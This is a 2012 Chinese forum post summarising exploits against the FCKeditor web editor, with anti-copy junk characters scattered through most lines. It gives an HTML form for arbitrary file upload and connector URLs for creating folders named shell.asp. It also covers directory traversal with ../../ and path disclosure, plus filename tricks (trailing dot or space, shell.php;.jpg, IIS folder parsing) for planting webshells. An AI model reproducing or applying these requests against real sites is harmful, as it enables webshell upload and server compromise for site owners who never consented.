FCKeditor漏洞利用总结

荒村狂客 · 发表于 2012-9-5 20:23:31

Fckeditor漏洞利用总结

查看编辑器版本
0 _( b V" [ Q7 o2 Q% z& sFCKeditor/_whatsnew.html: d- l0 {( c6 E( r* n# c5 W
—————————————————————————————————————————————————————————————

2. Version 2.2 版本
/ d" ^) u2 {3 ~# e$ [; Y# O9 FApache+linux 环境下在上传文件后面加个.突破！测试通过。6 _# ?$ @: b" o5 M6 C
—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。
% k8 e/ \) I- \; |' V' A S<form id="frmUpload" enctype="multipart/form-data"
/ L3 j3 W( v4 W+ J. `( z% U7 zaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
+ ~* m5 j( K$ y* P<input type="file" name="NewFile" size="50"><br>* i5 g! }( H3 O) j2 _7 q! A, a
<input id="btnUpload" type="submit" value="Upload">% K' [2 I! a, U6 T" R9 X/ M6 E
</form>" C2 y% s* \2 b+ T
—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法/ ^8 m/ ^1 |6 H8 t, \" Z* Z4 [& ^
很多时候上传的文件例如：shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。, S- ^7 p6 g$ q: e: U
4.1：提交shell.php+空格绕过7 r7 {2 C/ p9 B
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件未测试。0 P$ b( D) Z% ?9 S$ y2 l
4.2：继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹，只检测了第一级的目录，如果跳到二级目录就不受限制。5 E: {0 L/ q, ~9 U% d$ O a6 h3 F
—————————————————————————————————————————————————————————————

5. 突破建立文件夹$ L% `+ c/ T) b J$ Y9 n' G& u
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
C; ]) K& L; `1 g$ VFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
( O6 Q+ ~: n9 m—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址 e8 r% z7 I5 }) I% s
FCKeditor/editor/filemanager/browser/default/connectors/test.html& V0 N# U7 E4 P6 Y. T
FCKeditor/editor/filemanager/upload/test.html
. f. i( ~1 D6 X/ E; o4 [FCKeditor/editor/filemanager/connectors/test.html0 o' t6 ]8 t3 D- y+ V2 J1 ?8 i
FCKeditor/editor/filemanager/connectors/uploadtest.html" }% z$ S9 p- B+ N7 J2 K$ M7 t
—————————————————————————————————————————————————————————————4 d0 `; H/ V+ ~! |( V5 w6 S

7.常用上传地址$ c! l" b0 m! @
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
3 ?2 } q- M" G% T0 pFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
( e' P- F' o R4 n$ UFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)# f G6 a1 c" t! a- k
JSP 版：
( n2 ]) X- D& w" W8 o) RFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
0 a' @4 C$ |6 N8 x注意红色部分修改为FCKeditor 实际使用的脚本语言，蓝色部分可以自定义文$ H: C+ i# o( }* b7 N% S8 E$ W
件夹名称也可以利用../..目录遍历，紫色部分为实际网站地址。
5 c$ l9 p, U4 u9 _3 g7 O! ]—————————————————————————————————————————————————————————————

8.其他上传地址, i9 \( `: `( w. d9 B
FCKeditor/_samples/default.html1 H9 L4 {' a$ T1 b0 g8 N8 O0 K4 s# j
FCKeditor/_samples/asp/sample01.asp, h; Q, Q2 E# h- e1 ~4 T$ P
FCKeditor/_samples/asp/sample02.asp3 p0 m+ r. D; i6 C( l
FCKeditor/_samples/asp/sample03.asp
$ i' t+ S! [+ y3 k1 r2 iFCKeditor/_samples/asp/sample04.asp
6 g- d/ @* D. R# l/ a+ ^- o0 Q. `1 D一般很多站点都已删除_samples 目录，可以试试。
( @5 y; Z, R6 w/ u5 CFCKeditor/editor/fckeditor.html 不可以上传文件，可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
X) i2 `# Q8 W& ?—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址: B# U2 w. ?$ N" t3 [+ I4 d
Version 2.4.1 测试通过# Z7 D2 ^4 M* O% {) Q5 Q
修改CurrentFolder 参数使用 ../../来进入不同的目录
; [! g6 z3 c2 ]4 ?( M8 T* S/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp# r- G! K" d/ }
根据返回的XML 信息可以查看网站所有的目录。
) e3 x8 j+ C" }! D% k" m# K# v# ]FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
7 r4 V1 G! b9 F7 H也可以直接浏览盘符：) ~6 U( B0 Y5 }( F( ]/ J
JSP 版本：2 E; Z, z$ S$ C# o
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
# K: }4 j$ @3 v; z [5 K—————————————————————————————————————————————————————————————

10.爆路径漏洞
# ^" q3 n0 p1 P3 FFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp% Q- ^1 ?) S4 Q* o* D b" l3 y
—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题/ i+ r1 S8 K) ^+ i& U4 a4 f- g
      影响版本: FCKeditor x.x <= FCKeditor v2.4.3
9 u6 `2 ]" l$ X% \4 [脆弱描述：' o8 w) F7 Z3 q2 p, ?9 e' f/ I1 Q2 ~
FCKeditor v2.4.3 中File 类别默认拒绝上传类型：+ p0 H% q- Q! q6 ]8 q% B4 v# y4 e+ K
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm' A' u* q! E- x' Y) a/ I6 H
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName，而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!* z9 E4 N* s8 C3 J
      而在apache 下，因为"Apache 文件名解析缺陷漏洞"也可以利用之，另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码，其限制最为狭隘。; x0 V0 X! I" x) k* u, X
      在上传时遇见可直接上传脚本文件固然很好，但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过，也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!

admin · 发表于 2012-9-8 22:43:14

		自动登录	找回密码
密码			立即注册

FCKeditor漏洞利用总结

本帖子中包含更多资源